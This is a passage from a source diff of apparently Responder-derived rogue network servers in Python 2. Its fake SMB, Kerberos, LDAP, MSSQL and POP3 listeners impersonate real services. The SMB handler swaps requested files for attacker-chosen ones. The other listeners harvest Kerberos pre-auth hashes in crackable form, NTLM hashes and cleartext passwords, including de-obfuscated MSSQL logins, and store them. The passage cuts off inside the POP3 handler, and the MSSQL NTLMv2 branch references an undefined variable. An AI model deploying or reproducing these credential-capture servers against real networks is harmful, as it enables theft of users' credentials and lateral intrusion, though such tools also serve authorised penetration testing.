def smb2Close(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
# We're closing the connection trying to flush the client's
# cache.
if connData['MS15011']['StopConnection'] is True:
return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
return self.origsmb2Close(connId, smbServer, recvPacket)
def smb2Create(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls
createOptions = ntCreateRequest['CreateOptions']
if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [smb2.SMB2Error()], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
# Are we being asked for a directory?
if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
else:
targetFile = '/'
# 2. We change the filename in the request for our targetFile
ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
ntCreateRequest['NameLength'] = len(targetFile)*2
recvPacket['Data'] = str(ntCreateRequest)
# 3. We call the original call with our modified data
return self.origsmb2Create(connId, smbServer, recvPacket)
def smb2QueryDirectory(self, connId, smbServer, recvPacket):
# Windows clients with SMB2 will also perform a QueryDirectory
# expecting to get the filename asked. So we deliver it :)
connData = smbServer.getConnectionData(connId)
respSMBCommand = smb2.SMB2QueryDirectory_Response()
#queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])
errorCode = 0xff
respSMBCommand['Buffer'] = '\x00'
errorCode = STATUS_SUCCESS
#if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:
# return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED
if connData['MS15011']['FindDone'] is True:
connData['MS15011']['FindDone'] = False
smbServer.setConnectionData(connId, connData)
return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES
else:
origName, targetFile = connData['MS15011']['FileData']
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)
infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['EaSize'] = 0
infoRecord['EndOfFile'] = size
infoRecord['AllocationSize'] = size
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
infoRecord['ShortName'] = '\x00'*24
#infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')
infoRecord['FileName'] = origName.encode('utf-16le')
padLen = (8-(len(infoRecord) % 8)) % 8
infoRecord['NextEntryOffset'] = 0
respSMBCommand['OutputBufferOffset'] = 0x48
respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
connData['MS15011']['FindDone'] = True
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
respPacket = smb2.SMB2Packet()
respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb2.SMB2TreeConnect_Response()
treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])
errorCode = STATUS_SUCCESS
## Process here the request, does the share exist?
path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
UNCOrShare = path.decode('utf-16le')
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
#share = searchShare(connId, path.upper(), smbServer)
connData['MS15011'] = {}
connData['MS15011']['FindDone'] = False
connData['MS15011']['StopConnection'] = False
share = {}
if share is not None:
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
respPacket['TreeID'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
else:
smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR)
errorCode = STATUS_OBJECT_PATH_NOT_FOUND
respPacket['Status'] = errorCode
##
if path == 'IPC$':
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE
respSMBCommand['ShareFlags'] = 0x30
else:
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK
respSMBCommand['ShareFlags'] = 0x0
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x011f01ff
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
errorCode = STATUS_SUCCESS
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO)
#share = searchShare(connId, path, smbServer)
share = {}
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
resp['Tid'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
def start(self):
self.server.serve_forever()
def setDefaultFile(self, filename):
self.defaultFile = filename
def setExtensionsConfig(self, filename):
for line in filename.readlines():
line = line.strip('\r\n ')
if line.startswith('#') is not True and len(line) > 0:
extension, pathName = line.split('=')
self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())

204
core/servers/Kerberos.py Normal file

@@ -0,0 +1,204 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer, UDPServer
from core.responder.utils import *
class Kerberos:
def start(self):
try:
if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 88), KerbTCP)
server2 = ThreadingUDPServer((settings.Config.Bind_To, 88), KerbUDP)
else:
server1 = ThreadingTCPServer(('', 88), KerbTCP)
server2 = ThreadingUDPServer(('', 88), KerbUDP)
for server in [server1, server2]:
t = threading.Thread(name='Kerberos', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting Kerberos server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
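# Parse an AS-REQ that carries RC4-HMAC (etype 23, "\x17") PA-ENC-TIMESTAMP
# pre-authentication and rebuild it as a "$krb5pa$23$..." string suitable for
# offline cracking.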
def ParseMSKerbv5TCP(Data):
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[45:46])[0]
if HashLen == 53:
Hash = Data[48:99]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[147:148])[0]
Name = Data[148:148+NameLen]
DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
return False
def ParseMSKerbv5UDP(Data):
MsgType = Data[17:18]
EncType = Data[39:40]
if MsgType == "\x0a" and EncType == "\x17":
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
Hash = Data[49:101]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[149:150])[0]
Name = Data[150:150+NameLen]
DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
return False
class KerbTCP(BaseRequestHandler):
def handle(self):
try:
data = self.request.recv(1024)
KerbHash = ParseMSKerbv5TCP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except Exception:
raise
class KerbUDP(BaseRequestHandler):
def handle(self):
try:
data, soc = self.request
KerbHash = ParseMSKerbv5UDP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except Exception:
raise

167
core/servers/LDAP.py Normal file

@@ -0,0 +1,167 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
from core.responder.utils import *
class LDAP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 389), LDAPServer)
else:
server = ThreadingTCPServer(('', 389), LDAPServer)
t = threading.Thread(name='LDAP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting LDAP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
def ParseSearch(data):
Search1 = re.search('(objectClass)', data)
Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
Search3 = re.search('(?i)(objectClass0*.*supportedSASLMechanisms)', data)
if Search1:
return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
if Search2:
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
if Search3:
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
def ParseLDAPHash(data, client):
SSPIStart = data[42:]
LMhashLen = struct.unpack('<H',data[54:56])[0]
if LMhashLen > 10:
LMhashOffset = struct.unpack('<H',data[58:60])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[64:66])[0]
NthashOffset = struct.unpack('<H',data[66:68])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[72:74])[0]
DomainOffset = struct.unpack('<H',data[74:76])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[80:82])[0]
UserOffset = struct.unpack('<H',data[82:84])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+settings.Config.NumChal
SaveToDb({
'module': 'LDAP',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': NtHash,
'fullhash': WriteHash,
})
if LMhashLen < 2 and settings.Config.Verbose:
settings.Config.ResponderLogger.info("[LDAP] Ignoring anonymous NTLM authentication")
def ParseNTLM(data,client):
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
Search2 = re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data)
if Search1:
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=settings.Config.Challenge)
NTLMChall.calculate()
return str(NTLMChall)
if Search2:
ParseLDAPHash(data,client)
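# Minimal walk over the BER-encoded LDAPMessage: application tag 0x60 is a
# BindRequest (simple password or SASL/NTLM), 0x63 is a SearchRequest.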
def ParseLDAPPacket(data, client):
if data[1:2] == '\x84':
PacketLen = struct.unpack('>i',data[2:6])[0]
MessageSequence = struct.unpack('<b',data[8:9])[0]
Operation = data[9:10]
sasl = data[20:21]
OperationHeadLen = struct.unpack('>i',data[11:15])[0]
LDAPVersion = struct.unpack('<b',data[17:18])[0]
if Operation == "\x60":
UserDomainLen = struct.unpack('<b',data[19:20])[0]
UserDomain = data[20:20+UserDomainLen]
AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
if AuthHeaderType == "\x80":
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserDomain,
'cleartext': Password,
'fullhash': UserDomain+':'+Password,
})
if sasl == "\xA3":
Buffer = ParseNTLM(data,client)
return Buffer
elif Operation == "\x63":
Buffer = ParseSearch(data)
return Buffer
else:
if settings.Config.Verbose:
settings.Config.ResponderLogger.info('[LDAP] Operation not supported')
# LDAP Server class
class LDAPServer(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(0.5)
data = self.request.recv(8092)
Buffer = ParseLDAPPacket(data,self.client_address[0])
if Buffer:
self.request.send(Buffer)
except socket.timeout:
pass

186
core/servers/MSSQL.py Normal file

@@ -0,0 +1,186 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from traceback import print_exc   # used in the error handler in MSSQL.start()
import struct
import core.responder.settings as settings
import threading
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
from core.responder.utils import *
class MSSQL:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 1433), MSSQLServer)
else:
server = ThreadingTCPServer(('', 1433), MSSQLServer)
t = threading.Thread(name='MSSQL', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting MSSQL server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class TDS_Login_Packet():
def __init__(self, data):
ClientNameOff = struct.unpack('<h', data[44:46])[0]
ClientNameLen = struct.unpack('<h', data[46:48])[0]
UserNameOff = struct.unpack('<h', data[48:50])[0]
UserNameLen = struct.unpack('<h', data[50:52])[0]
PasswordOff = struct.unpack('<h', data[52:54])[0]
PasswordLen = struct.unpack('<h', data[54:56])[0]
AppNameOff = struct.unpack('<h', data[56:58])[0]
AppNameLen = struct.unpack('<h', data[58:60])[0]
ServerNameOff = struct.unpack('<h', data[60:62])[0]
ServerNameLen = struct.unpack('<h', data[62:64])[0]
Unknown1Off = struct.unpack('<h', data[64:66])[0]
Unknown1Len = struct.unpack('<h', data[66:68])[0]
LibraryNameOff = struct.unpack('<h', data[68:70])[0]
LibraryNameLen = struct.unpack('<h', data[70:72])[0]
LocaleOff = struct.unpack('<h', data[72:74])[0]
LocaleLen = struct.unpack('<h', data[74:76])[0]
DatabaseNameOff = struct.unpack('<h', data[76:78])[0]
DatabaseNameLen = struct.unpack('<h', data[78:80])[0]
self.ClientName = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
self.UserName = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
self.Password = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
self.AppName = data[8+AppNameOff:8+AppNameOff+AppNameLen*2].replace('\x00', '')
self.ServerName = data[8+ServerNameOff:8+ServerNameOff+ServerNameLen*2].replace('\x00', '')
self.Unknown1 = data[8+Unknown1Off:8+Unknown1Off+Unknown1Len*2].replace('\x00', '')
self.LibraryName = data[8+LibraryNameOff:8+LibraryNameOff+LibraryNameLen*2].replace('\x00', '')
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
def ParseSQLHash(data, client):
SSPIStart = data[8:]
LMhashLen = struct.unpack('<H',data[20:22])[0]
LMhashOffset = struct.unpack('<H',data[24:26])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[30:32])[0]
NthashOffset = struct.unpack('<H',data[32:34])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[36:38])[0]
DomainOffset = struct.unpack('<H',data[40:42])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[44:46])[0]
UserOffset = struct.unpack('<H',data[48:50])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NtHash, settings.Config.NumChal)
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': LMHash+":"+NtHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NtHash[:32], NtHash[32:])
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+User,
'hash': NTHash[:32]+":"+NTHash[32:],
'fullhash': WriteHash,
})
def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5',''))
Pw = []
for x in Pwd:
Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
return ''.join(Pw)
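A worked example of the per-byte transform above may help; assuming the usual TDS7 obfuscation (nibble swap then XOR 0xA5 on the client side), decoding is XOR 0xA5 followed by a nibble swap, which the reversed-hex-string trick performs:
# Sketch: decoding a single hypothetical password byte the same way ParseSqlClearTxtPwd does.
x = 0x92                                                          # obfuscated byte for 's'
print hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')     # -> 's'
# 0x92 ^ 0xA5 = 0x37; hex() gives '0x37', and reversing the string then keeping two chars swaps the nibbles -> '73' -> 's'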
def ParseClearTextSQLPass(data, client):
TDS = TDS_Login_Packet(data)
SaveToDb({
'module': 'MSSQL',
'type': 'Cleartext',
'client': client,
'hostname': "%s (%s)" % (TDS.ServerName, TDS.DatabaseName),
'user': TDS.UserName,
'cleartext': ParseSqlClearTxtPwd(TDS.Password),
'fullhash': TDS.UserName +':'+ ParseSqlClearTxtPwd(TDS.Password),
})
# MSSQL Server class
class MSSQLServer(BaseRequestHandler):
def handle(self):
if settings.Config.Verbose:
settings.Config.ResponderLogger.info("[MSSQL] Received connection from %s" % self.client_address[0])
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(0.1)
# Pre-Login Message
if data[0] == "\x12":
Buffer = str(MSSQLPreLoginAnswer())
self.request.send(Buffer)
data = self.request.recv(1024)
# NegoSSP
if data[0] == "\x10":
if re.search("NTLMSSP",data):
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
Packet.calculate()
Buffer = str(Packet)
self.request.send(Buffer)
data = self.request.recv(1024)
else:
ParseClearTextSQLPass(data,self.client_address[0])
# NegoSSP Auth
if data[0] == "\x11":
ParseSQLHash(data,self.client_address[0])
except socket.timeout:
pass
self.request.close()

90  core/servers/POP3.py  Normal file
@@ -0,0 +1,90 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from traceback import print_exc
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import POPOKPacket
class POP3:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 110), POP3Server)
else:
server = ThreadingTCPServer(('', 110), POP3Server)
t = threading.Thread(name='POP3', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting POP3 server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# POP3 Server class
class POP3Server(BaseRequestHandler):
def SendPacketAndRead(self):
Packet = POPOKPacket()
self.request.send(str(Packet))
data = self.request.recv(1024)
return data
def handle(self):
try:
data = self.SendPacketAndRead()
if data[0:4] == "USER":
User = data[5:].replace("\r\n","")
data = self.SendPacketAndRead()
if data[0:4] == "PASS":
Pass = data[5:].replace("\r\n","")
SaveToDb({
'module': 'POP3',
'type': 'Cleartext',
'client': self.client_address[0],
